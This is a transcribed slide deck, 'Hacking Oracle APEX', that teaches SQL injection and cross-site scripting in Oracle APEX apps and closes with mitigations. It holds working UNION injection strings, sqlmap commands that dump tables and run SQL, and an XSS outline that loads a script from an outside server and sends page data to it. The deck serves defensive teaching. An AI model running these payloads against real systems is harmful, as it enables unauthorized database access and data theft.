Hacking Oracle APEX. Welcome. About

Similar documents
C1: Define Security Requirements

Copyright

OWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

Web Application Security. Philippe Bogaerts

Exploiting and Defending: Common Web Application Vulnerabilities

WELCOME. APEX Security Primer. About Enkitec. About the Presenter. ! Oracle Platinum Partner! Established in 2004

OWASP Top 10 The Ten Most Critical Web Application Security Risks

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

Secure your APEX application

OWASP Top 10. Copyright 2017 Ergon Informatik AG 2/13

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

Your Turn to Hack the OWASP Top 10!

Aguascalientes Local Chapter. Kickoff

ANZTB SIGIST May 2011 Perth OWASP How minor vulnerabilities can do very bad things. OWASP Wednesday 25 th May The OWASP Foundation

OWASP TOP OWASP TOP

John Coggeshall Copyright 2006, Zend Technologies Inc.

OPEN WEB APPLICATION SECURITY PROJECT OWASP TOP 10 VULNERABILITIES

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

Secure Development Guide

Application Layer Security

Advanced Web Technology 10) XSS, CSRF and SQL Injection

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

THREAT MODELING IN SOCIAL NETWORKS. Molulaqhooa Maoyi Rotondwa Ratshidaho Sanele Macanda

Penetration Testing following OWASP. Boyan Yanchev Chief Technology Ofcer Peter Dimkov IS Consultant

Web Application Vulnerabilities: OWASP Top 10 Revisited

I, J, K. Lightweight directory access protocol (LDAP), 162

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

Application vulnerabilities and defences

Featuring. and. Göteborg. Ulf Larson Thursday, October 24, 13

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

SECURITY TESTING. Towards a safer web world

Why bother? Causes of data breaches OWASP. Top ten attacks. Now what? Do it yourself Questions?

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Solutions Business Manager Web Application Security Assessment

Introduction F rom a management perspective, application security is a difficult topic. Multiple parties within an organization are involved, as well

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

1 About Web Security. What is application security? So what can happen? see [?]

OWASP Top David Caissy OWASP Los Angeles Chapter July 2017


The security of Mozilla Firefox s Extensions. Kristjan Krips


Jacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013

& ( ); INSERT INTO ( ) SELECT

CS50 Quiz Review. November 13, 2017

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

Security Best Practices. For DNN Websites

Applications Security

Defend Your Web Applications Against the OWASP Top 10 Security Risks. Speaker Name, Job Title

Web Application Penetration Testing

(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection

WEB SECURITY p.1

A D V I S O R Y S E R V I C E S. Web Application Assessment

CSE 127 Computer Security

Bank Infrastructure - Video - 1

Web basics: HTTP cookies

CSWAE Certified Secure Web Application Engineer

Information Security. Gabriel Lawrence Director, IT Security UCSD

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

Welcome to the OWASP TOP 10

GET POST ORDS JSON: Web Services for APEX Decoded

Web Vulnerabilities. And The People Who Love Them

Hacking Web Sites OWASP Top 10

CSCD 303 Essential Computer Security Fall 2018

RiskSense Attack Surface Validation for Web Applications

CSCD 303 Essential Computer Security Fall 2017

SAP Security. BIZEC APP/11 Version 2.0 BIZEC TEC/11 Version 2.0

Integrity attacks (from data to code): Cross-site Scripting - XSS

Lecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion

CSCE 813 Internet Security Case Study II: XSS

Mobile Malfeasance. Exploring Dangerous Mobile Code. Jason Haddix, Director of Penetration Testing

Kenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data

Web basics: HTTP cookies

WEB SECURITY: XSS & CSRF

Top 10 Application Security Vulnerabilities in Web.config Files Part One

Securing Your Company s Web Presence

Protect Your Application with Secure Coding Practices. Barrie Dempster & Jason Foy JAM306 February 6, 2013

GOING WHERE NO WAFS HAVE GONE BEFORE

Holistic Database Security

OWASP TOP 10. By: Ilia

Web Penetration Testing

Using RESTfull services and remote SQL

SQL Injection Attacks and Defense

Web Security: Vulnerabilities & Attacks

Client Side Injection on Web Applications

ShiftLeft. Real-World Runtime Protection Benchmarking

The Weakest Link: Mitigating Web Application Vulnerabilities. webscurity White Paper. webscurity Inc. Minneapolis, Minnesota USA

Top 10 Web Application Vulnerabilities

An analysis of security in a web application development process

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

Security. CSC309 TA: Sukwon Oh

Ethical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities

Domino Web Server Security

Certified Secure Web Application Engineer

McAfee Database Security

Evaluating the Security Risks of Static vs. Dynamic Websites

Transcription:

Hacking Oracle APEX!2 About Me Welcome scott@sumnertech.com @sspendol!3!4

About Sumner Technologies Originally Established 2005 Relaunched in 2015 Focused exclusively on Oracle APEX solutions Provide wide range of APEX related Services Architecture Design & Reviews Security Reviews Health Checks Education On-site, On-line, On-Demand Custom & Mentoring Oracle Database Cloud Consulting Curators of APEX-SERT Agenda Overview SQL Injection Cross Site Scripting Summary!5!6 Overview OWASP Open Web Application Security Project (OWASP) https://www.owasp.org/index.php/main_page OWASP is an open community dedicated to enabling organizations to conceive, develop, acquire, operate, and maintain applications that can be trusted. All of the OWASP tools, documents, forums, and chapters are free and open to anyone interested in improving application security.!7!8

OWASP Top 10 Awareness document for web application security Represents a broad consensus about the most critical security risks to web applications Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Download the full report here: https://www.owasp.org/images/7/72/ OWASP_Top_10-2017_%28en%29.pdf.pdf OWASP Top 10 XSS flaws occur whenever an A1:2017 - Injection application includes untrusted data in a new web page without proper validation or A2:2017 - Broken escaping, Authentication or updates an existing web page with usersupplied data using a browser API that can create A3:2017 - Sensitive Data Exposure Injection HTML or JavaScript. XSS allows attackers to execute flaws, such as SQL, NoSQL, A4:2017 - XML scripts External in the Entities victim s browser (XXE) which can hijack user OS, and LDAP injection, occur when sessions, deface web sites, or redirect the A5:2017 - Broken Access untrusted Control data is sent to an interpreter as part user to malicious sites. of a command or query. The attacker s hostile A6:2017 - Security Misconfiguration data can trick the interpreter into executing unintended commands or accessing data A7:2017 - Cross-Site Scripting (XSS) without proper authorization. A8:2017 - Insecure Deserialization A9:2017 - Using Components with Known Vulnerabilities A10:2017 - Insufficient Logging & Monitoring!9!10 OWASP & APEX Security With APEX, you need to be concerned with at least 8 of the top 10 XML External Entities & Insecure Deserialization can be largely ignored in most cases But the rest can t! Risks of SQLi & XSS in APEX In reality, the risks of SQLi & XSS in APEX is almost none - as long as you never build an application and adjust any settings If you do develop applications - and perhaps alter some of the settings, then the risks are much, much higher Yet can be easily mitigated - if you know what you re doing!11!12

SQL Injection SQL Injection (SQLi) SQL Injection is when a user enters some SQL that ends up being executed and alters the intended functionality and/or results of the system Typically for the worse, not for the better Possible to inject both DDL & DML All depends on the skill of the attacker and privileges of the schema At minimum, it is disruptive Restore dropped tables Worst case, it is catastrophic Find another career path!13!14 SQL Injection SQL Injection!15!16

sqlmap sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers http://sqlmap.org https://github.com/sqlmapproject/sqlmap Command-line tool that probes for and exploits SQL injection vulnerabilities in any major database MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB & Informix sqlmap Features Uses six SQL Injection attack types Boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band Built-in support to get users, password hashes, privileges, roles, databases, tables and columns Ability to crack passwords w/a dictionary-based attack Can search data dictionary for tables, columns, etc. Execute arbitrary commands and retrieve their output!17!18 sqlmap Warning Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Flawed Application All it takes is a single SQL injection flaw to open the flood gates which allows any SQL to be run Our example contains a report with the following SQL: SELECT empno, ename, job FROM emp WHERE ename LIKE '%&P1_ITEM.%' Using the &ITEM. Syntax will allow a user to re-write the SQL statement!19!20

Flawed Application Thus, if the user enters a malicious string as a filter, the SQL will be re-written: SELECT empno, ename, job FROM emp WHERE ename LIKE '%' UNION SELECT empno, ename, to_char(sal) job FROM emp WHERE '%' LIKE '%' Now, the SQL will return the SAL of each employee - something that was not part of the intended functionality of the application Flawed Application Or: SELECT empno, ename, job FROM emp WHERE ename LIKE '%ABC' UNION ALL SELECT NULL,TO_CHAR(CREATED),USERNAME FROM SYS.ALL_USERS --%' Now, the SQL will return the CREATED, USERNAME and USER_ID from SYS.ALL_USERS Essentially, it s trivial to neuter the original query and introduce any new query we want via a simple UNION!21!22 wwv_flow.show For sqlmap to work, we have to be able to provide a valid parameter name that triggers a SQLi flaw APEX uses a single parameter p with a colon-delimited string which does not have a flaw http://vm51/ords/f?p=121:1:12450968363470::::p1_item:abc wwv_flow.show Thus, we can re-write the APEX URL using wwv_flow.show and reference an APEX item This URL: http://vm51/ords/f?p=121:1:12450968363470::::p1_item:abc Becomes: This format won t work, as we have no control as to where the parameters passed in to p go http://vm51/ords/wwv_flow.show? p_flow_id=121 &p_flow_step_id=1 &p_instance=12450968363470 &p_arg_name=p1_item &p_arg_value=abc f? Application ID Page ID Session ID Item Name Item Value!23!24

sqlmap: Basics Command basics & flags sqlmap: Banner & Current User To get the banner and current user from the database: python sqlmap.py Base command -u "http://vm51/ords/wwv_flow.show?p_flow_id=121 &p_flow_step_id=1 &p_instance=0 &p_arg_name=p1_item &p_arg_value=abc" URL to use --batch Take all defaults --dbms Oracle Database = Oracle -p p_arg_value Inject into this parameter --flush-session Flush all cached data python sqlmap.py -u "<url>" -b -current_user Print the Banner Get the current user!25!26 sqlmap: Authenticated Pages Works with authenticated pages as well Simply copy the Session ID & APEX cookie name and value and include that Examples in this presentation will use a public page to save time --cookie "<name> = <value>" sqlmap: SQL Query Pass in SQL query to execute python sqlmap.py -u "<url>" D <schema> --stop=25 --sql_query="<sql_query>" Cap rows returned at 25!27!28

sqlmap: Declarative Query Pass in schema, table and columns that you want to fetch: python sqlmap.py -u "<url>" D <schema> -T <table_name> -C "<col1>,<col2>,<col3>" sqlmap: Search Columns To search all user columns for a specific string: python sqlmap.py -u "<url>" D <schema> --search Enables search -C <string>!29!30 sqlmap: Extract Table Data To extract all data from a table: python sqlmap.py -u "<url>" D <schema> -T <table> --dump Export data to CSV file Demo: sqlmap!31!32

Demo Oracle Banner & User Public Page & Authenticated Workspace Applications Workspace Users Database Users Application Report SQL User Tables Search Columns Dump Table Contents Mitigation Don t use &ITEM. Syntax in your SQL Be very cautious when using EXECUTE IMMEDIATE and DBMS_SQL If users can influence parameters to either, that data should be sanitized and/or restricted Use a shadow schema Only expose the tables/column required for the application Remove all unnecessary privileges to prevent DDL Use VPD or secure views SQL Injection circumvents most APEX-based security!33!34 Mitigation Remember this: A10:2017 - Insufficient Logging & Monitoring Be sure to monitor your APEX logs sqlmap has a specific user agent: sqlmap/1.2.3.4#dev (http://sqlmap.org) If you see that in your page views, someone is probing/ attacking your database Mitigation Use an APEX-specific security tool APEX-SERT ApexSec Be cautious when using EXECUTE IMMEDIATE or DBMS_SQL Both can potentially open up SQL Injection holes with and without using the &ITEM. syntax Conduct peer reviews of your code As Tom Kyte used to say, get someone who doesn t like you to review it - results will be better!35!36

Cross Site Scripting Cross Site Scripting (XSS) Not to be confused with CSS, Cross Site Scripting is when a foreign unauthorized script is executed Reference or even the script is inserted into the database When it is displayed, it is not properly escaped, and thus executes vs. harmlessly displays Typically demoed using a simple Hello alert Which does not even begin to describe the damage that XSS is capable of So we ll use some more serious exploits for emphasis!37!38 XSS in APEX Like SQLi, a developer will have to go out of their way to introduce an XSS vulnerability But it s more common than you may think Consider this example: A requirement states to display Address1 & Address2 in the same cell but on new lines in a report You enter the <br /> tag between them, but when you run, you see the HTML, not the actual line break After some experimentation, you realize that by setting Escape Special Characters to No, the data displays as per the requirement XSS in APEX While the requirement may have been met, you also just introduced a XSS vulnerability to your application Since any data rendered in that column will potentially execute if it contains a <script> tag Better approach: use the HTML Expression attribute and refer to columns as #COLUMN#!39!40

Anatomy of an XSS Attack <script src="https://server/ bad.js"></script> Vulnerable Application SSN, Credit Card, etc. Web Service bad.js Hacker s Server Database Web Service A simple ORDS web service was created to receive the data POST with a single parameter: p_val Type of PL/SQL Code: BEGIN INSERT INTO t VALUES (:p_val); END;!41!42 Page Item Values In this scenario, a XSS attack will capture page item values and send them to another server Works for any item in the HTML - including global page items Function will get the value of a page item and call a web service, passing that value as a parameter Web service, in turn, will simply insert the payload into a table where it can be inspected at any time Demo: Page Items Values!43!44

Interactive Report Data Next, we can also grab data displayed in an Interactive Report Specific attack is limited to the rows that render with the compromised row Thus, an attacker may compromise several or all rows Possible to engineer a more effective attack Via unescaped persistent regions or items Demo: Interactive Report Data!45!46 Interactive Grid Data Even easier to capture data from an Interactive Grid Specifically when Lazy Loading is set to No Possible - but more complex - to also capture data if Lazy Loading is set to Yes Demo: Interactive Grid Data!47!48

APEX Components Not running Production in runtime-only mode is dangerous You ve heard this for years But you ve probably not changed your mind and still let developers log into production Time to re-think that decision As an end user, we can inject some code that when a developer is logged into and running an application, that code will execute and can create and/or modify APEX components Demo: APEX Components!49!50 Mitigation Never disable escaping on columns When you do, be sure you know where the data is coming from or escape it with APEX_ESCAPE Always use APEX_ESCAPE when rendering HTML via htp.p or htp.prn Different options for different scenarios JSON, LDAP, HTML, REGEXP Be wary of Application Items that are rendered as HTML Source is not escaped by default Mitigation Use an APEX-specific security tool APEX-SERT ApexSec!51!52

Summary Summary SQLi & XSS are possible in almost every language Much less likely in APEX than others, but not impossible With most platforms, developers have to introduce the risk either deliberately (unlikely) or accidentally (likely) APEX remains one of the most secure development platform when used properly Not unlike a car, hammer, flame thrower, gun, etc. Subscribing to secure best practices combined with using a security evaluation tool will ensure that risks are minimized or eliminated APEX-SERT & RecX are two specific to APEX!53!54!55

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback